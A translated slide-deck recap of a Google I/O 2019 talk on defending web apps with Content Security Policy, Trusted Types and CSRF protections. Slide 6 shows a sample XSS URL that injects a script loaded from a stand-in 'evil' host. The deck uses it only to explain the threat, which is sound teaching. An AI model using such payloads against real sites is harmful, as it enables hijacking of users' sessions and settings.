A loose translation of 'Securing Web Apps with Modern Platform Features' / Translate Securing Web Apps with Modern Platform Features

sunecosuri

June 19, 2019

Transcript

  1. Securing Web Apps with Modern Platform Features
     @sunecosuri Date: 2019-06-19
     My recap of the "Google I/O'19 Web recap" meetup

  2. Securing Web Apps with Modern Platform Features
     Note: although the title says "recap", some parts are skipped, so this is not a complete summary.
     For the details, please watch the original session video:
     https://www.youtube.com/watch?v=DDtM9caQ97I

  3. GMO Pepabo engineer, Hosting Division, Hosting Group, Managed Cloud Team / @sunecosuri

  4. Overview (about this session)
     Common vulnerabilities such as XSS and CSRF have plagued the Web for a long time and are still reported frequently to Google's Vulnerability Reward Program. Learn the security mechanisms of the modern Web platform, protect your service from injection, and isolate it from dangerous sites.
     Also, learn a checklist for protecting your application with new browser features born from the experience of the Google security team that guards the most sensitive apps on the Web.

  5. Last year's breakdown of bug bounty (reward program) reports

  6. Cross-site scripting (XSS): injections
     1. A logged-in user visits the attacker's page
     2. The attacker lures the user to a vulnerable URL
        https://test.example/?query=<script src="//evil/">
     3. The script runs and the attacker gains access to the user's settings

  7. XSS is painful
     Among these injection attacks, XSS is a major problem across the whole industry

  8. Let's start with CSP
     First, let's start with Content Security Policy

  9. Content Security Policy Level 3
     A mechanism that controls script execution per resource. Introduce fine-grained control over which scripts your application executes, and defend against XSS.
     It can control script execution and plugin loading.
     CSP is not a substitute for proper escaping, nor does it fix the bugs that allow XSS.
  10. How to implement
      How do you actually implement it?

  11. Content Security Policy
      CSP is an HTTP response header (captured from the Network tab in Chrome DevTools).
      The browser receives the policy attached to the response, reads it, and decides whether each resource may execute.

  12. Support for reports
      CSP also supports a report-only mode

  13. Support for reports

  14. Content Security Policy: the idea behind nonce-based CSP
      With CSP configured this way, scripts without a nonce are blocked by the browser, and script tags carrying a valid nonce are executed.
      If the nonce is changed on every request, the attacker cannot predict it.

  15. But then wouldn't JavaScript hosted elsewhere, such as on a CDN, stop executing…?

  16. Content Security Policy: 'strict-dynamic' is for exactly that
      With strict-dynamic, scripts that are already trusted are propagated: scripts created by a nonced script become executable and are run.

  17. Content Security Policy: how to roll it out
      1. Remove inline event handlers specified via onclick or href
      2. Set the nonce in the server-side template
      3. Set CSP in the response header

  18. Trusted Types
      A mechanism that lets you constrain updates to the DOM.
      1. The DOM can only be updated with Trusted Types objects produced by Trusted Type policies you define individually
      2. Sanitization logic can be concentrated in the policy objects
      A polyfill that works in every browser is available at https://github.com/WICG/trusted-types, so you can try it today.

  19. Trusted Types
      1. Create a policy that defines the validation rules
      2. Use the policy to create objects of the trusted types
      3. Add the created "samplePolicy" to the CSP header, and it can be used

  20. Trusted Types
      The default policy acts as a fallback when a plain String is passed in.
      1. Create a policy that defines the validation rules
      2. Add it to the CSP header

  21. Trusted Types: what is the benefit?
      1. The DOM can only be updated with Trusted Types objects produced by the Trusted Type policies you define
      2. Sanitization logic can be concentrated in the policy objects
      Details: https://github.com/WICG/trusted-types
  22. Cross-site request forgeries
      On CSRF countermeasures

  23. Cross-site request forgeries: the difference between Origin and Site
      • same-origin: sites that share the same scheme, host and port
        - https://www.google.com/foo
        - https://www.google.com/bar
      • same-site: sites that share the same scheme and registrable domain
        - https://mail.google.com
        - https://photos.google.com
      • cross-site: everything else (https://www.youtube.com/ vs https://www.google.com/)

  24. Sec-Fetch-Site / Sec-Fetch-Mode
      In the future, these headers will let the server tell same-origin requests from CORS and other kinds of requests.

  25. The end